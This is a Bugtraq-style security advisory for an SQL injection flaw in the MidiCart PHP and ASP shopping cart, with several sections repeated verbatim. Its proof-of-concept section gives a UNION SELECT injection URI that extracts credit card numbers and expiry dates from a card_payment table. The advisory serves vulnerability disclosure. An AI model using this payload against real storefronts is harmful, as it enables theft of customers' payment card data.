MidiCart PHP Item_List.PHP SecondGroup Parameter SQL Injection Vulnerability
BID:13514
Info
MidiCart PHP Item_List.PHP SecondGroup Parameter SQL Injection Vulnerability
| Bugtraq ID: | 13514 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 05 2005 12:00AM |
| Updated: | Nov 28 2006 03:55AM |
| Credit: | Exoduks <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
MidiCart Software MidiCart PHP Shopping Cart MidiCart Software MidiCart ASP Plus 0 MidiCart Software MidiCart ASP |
| Not Vulnerable: | |
Discussion
MidiCart PHP Item_List.PHP SecondGroup Parameter SQL Injection Vulnerability
MidiCart PHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue is reported to affect both the PHP and ASP versions of MidiCart Shopping Cart.
MidiCart PHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue is reported to affect both the PHP and ASP versions of MidiCart Shopping Cart.
Exploit / POC
MidiCart PHP Item_List.PHP SecondGroup Parameter SQL Injection Vulnerability
No exploit is required.
The following proof-of-concept URIs are available:
http://www.example.com/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, creditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment
http://www.example.com/path/item_list.asp?maingroup=Something&secondgroup=[SQL INJECTION]
No exploit is required.
The following proof-of-concept URIs are available:
http://www.example.com/shop/item_list.php?secondgroup=-99 'UNION SELECT null, null, creditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment
http://www.example.com/path/item_list.asp?maingroup=Something&secondgroup=[SQL INJECTION]
Solution / Fix
MidiCart PHP Item_List.PHP SecondGroup Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
MidiCart PHP Item_List.PHP SecondGroup Parameter SQL Injection Vulnerability
References:
References:
- MidiCart Homepage (MidiCart Software)
- [Aria-Security Team] MidiCart ASP Plus Shopping Cart SQL Injection (Aria-Security)
- [Aria-Security Team] MidiCart ASP Shopping Cart SQL Injection (Aria-Security)
- [hackgen-2005-#004] - Multiple bugs in MidiCart PHP Shopping Cart ("Exoduks" - HackGen Team)